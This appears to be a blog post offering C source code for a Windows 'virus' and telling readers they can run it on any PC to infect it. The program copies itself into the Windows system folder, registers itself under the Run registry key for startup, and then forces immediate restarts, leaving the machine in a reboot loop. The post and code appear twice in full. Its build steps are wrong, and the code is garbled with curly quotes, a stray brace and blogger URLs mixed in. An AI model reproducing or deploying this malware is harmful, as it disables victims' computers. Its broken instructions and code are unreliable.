Welcome to RyberSoft today we are to discuss a script which can be used to shutdown the PC on startup. Yeah it's a method to put the PC in a situation where reseting or formatting will be only option. Here, the script needs to be executed only once and from then on, it will carry out the rest of the operation on its own. It have been programmed using the C language. And if you are familiar with the C language, then it is too easy to understand the logic behind the coding.
So to begin first copy this code and paste it in notepad.
Then go to save option and save it with *.exe extension. That's all required to do and now you can run it on any PC to infect it. You can even schedule Windows PC to run the script automatically on any event or time.
And The code is given down below.
#include<dos.h>
#include<dir.h>
int found,drive_no;
char buff[128];
void findroot()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //This is to determine the root drive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //This is to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
(https://www.blogger.com/null)if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=2; return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC); if(done==0)
{
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3; return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC); if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],“rb”); //The virus file open’s itself
self=fopen(_argv[0],“rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\windows\system\sysres.exe”,“wb”);//to place a copy of itself
in a remote place
system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d C:\windows\system\sysres.exe”);//put this file to registry
for starup
break;
case 2:
target=fopen(“D:\windows\system\sysres.exe”,“wb”);
system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d D:\windows\system\sysres.exe”);
break;
case 3:
target=fopen(“E:\windows\system\sysres.exe”,“wb”);
(https://www.blogger.com/null)system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d E:\windows\system\sysres.exe”);
break;
case 4:
target=fopen(“F:\windows\system\sysres.exe”,“wb”);
system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d F:\windows\system\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0”);//if the system is already infected then just give a
command to restart
}//code ends now
NOTE: Do Not Try It On Your Own System.
NOTE: We are providind this code for trining purpose only and RyberSoft wouldnot be responsible for any unethical use of this code.
So to begin first copy this code and paste it in notepad.
Then go to save option and save it with *.exe extension. That's all required to do and now you can run it on any PC to infect it. You can even schedule Windows PC to run the script automatically on any event or time.
And The code is given down below.
#include<dos.h>
#include<dir.h>
int found,drive_no;
char buff[128];
void findroot()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //This is to determine the root drive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //This is to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
(https://www.blogger.com/null)if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=2; return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC); if(done==0)
{
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3; return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC); if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],“rb”); //The virus file open’s itself
self=fopen(_argv[0],“rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\windows\system\sysres.exe”,“wb”);//to place a copy of itself
in a remote place
system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d C:\windows\system\sysres.exe”);//put this file to registry
for starup
break;
case 2:
target=fopen(“D:\windows\system\sysres.exe”,“wb”);
system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d D:\windows\system\sysres.exe”);
break;
case 3:
target=fopen(“E:\windows\system\sysres.exe”,“wb”);
(https://www.blogger.com/null)system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d E:\windows\system\sysres.exe”);
break;
case 4:
target=fopen(“F:\windows\system\sysres.exe”,“wb”);
system(“REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \/v
sres \/t REG_SZ \/d F:\windows\system\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0”);//if the system is already infected then just give a
command to restart
}//code ends now
NOTE: Do Not Try It On Your Own System.
NOTE: We are providind this code for trining purpose only and RyberSoft wouldnot be responsible for any unethical use of this code.
COMMENTS